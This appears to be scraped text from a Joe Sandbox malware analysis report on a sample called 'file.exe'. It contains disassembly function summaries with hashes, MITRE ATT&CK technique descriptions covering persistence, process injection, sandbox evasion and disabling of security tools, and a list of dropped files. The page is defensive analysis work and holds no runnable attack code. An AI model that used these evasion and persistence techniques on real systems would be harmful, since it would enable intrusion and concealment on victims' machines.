Unknown pseudo relocation protocol version %d., xrefs: 0000000140001B8B

Memory Dump Source

Source File: 00000017.00000002.3409823550.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000017.00000002.3409748673.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000017.00000002.3409844512.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000017.00000002.3409864252.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000017.00000002.3409882051.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_140000000_conhost.jbxd

Similarity

API ID: ProtectVirtual
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
API String ID: 544645111-395989641
Opcode ID: 3eb095557935172752f0c42cb9a03414d6f1cc8c641419fc4b235c5b65ea0db9
Instruction ID: 880ce9b900098d8e88b33aba92109972d092741ba7b51464eee9d571f7133d00
Opcode Fuzzy Hash: 3eb095557935172752f0c42cb9a03414d6f1cc8c641419fc4b235c5b65ea0db9
Instruction Fuzzy Hash: E45114B6B11544DAEB12CF67F840BE827A1A759BE8F548212FB1D077B4DB38C986C700

Function 0000000140001800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fprintf.MSVCRT ref: 000000014000185A

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 000000014000184D
Unknown error, xrefs: 0000000140001824

Memory Dump Source

Source File: 00000017.00000002.3409823550.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000017.00000002.3409748673.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000017.00000002.3409844512.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000017.00000002.3409864252.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000017.00000002.3409882051.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_140000000_conhost.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: b5717ce3617b469f524d5a4a977c465a2e3941e764333e1ecdac5e330ef02b4f
Instruction ID: 22fde9f0a61d81c45d0352baa9b4897200fbcb7987813caf25585494093de0dd
Opcode Fuzzy Hash: b5717ce3617b469f524d5a4a977c465a2e3941e764333e1ecdac5e330ef02b4f
Instruction Fuzzy Hash: 4BF09671A14A4482E612EF6AB9417ED6360E75D7C1F50D211FF4D576A5DF3CD182C310

Function 000000014000219E Relevance: 5.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 00000001400021B2
TlsGetValue.KERNEL32 ref: 00000001400021EB
GetLastError.KERNEL32 ref: 00000001400021F0
LeaveCriticalSection.KERNEL32 ref: 000000014000226C

Memory Dump Source

Source File: 00000017.00000002.3409823550.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000017.00000002.3409748673.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000017.00000002.3409844512.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000017.00000002.3409864252.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000017.00000002.3409882051.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_140000000_conhost.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: cfe5d0de1f15cf2fea71291f3d789f0cc0b44e62d3dc103620a81fc554713c6a
Instruction ID: 8a64a9037fcb0f8d448323bea24b37e1dc06a06277b74631a343a5268b32208f
Opcode Fuzzy Hash: cfe5d0de1f15cf2fea71291f3d789f0cc0b44e62d3dc103620a81fc554713c6a
Instruction Fuzzy Hash: 1901B2B6705A0192FA5BDB53FE083E86360B76CBD1F854021EF0953AB4DF79C996C200

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Snort Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hmgre3nn.jyw.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r4oek4jq.iqf.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_twscbzmi.cu3.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ukrdmtf5.ewz.psm1

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Windows\Temp\__PSScriptPolicyTest_1ksoiwsx.q32.ps1

C:\Windows\Temp\__PSScriptPolicyTest_l35xcuuo.y1v.psm1

C:\Windows\Temp\__PSScriptPolicyTest_o2zndmgw.43f.psm1

C:\Windows\Temp\__PSScriptPolicyTest_usg3rmda.ml4.ps1

C:\Windows\Temp\gtebvdararzg.sys

Static File Info

General

File Icon

Windows Analysis Report
file.exe

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre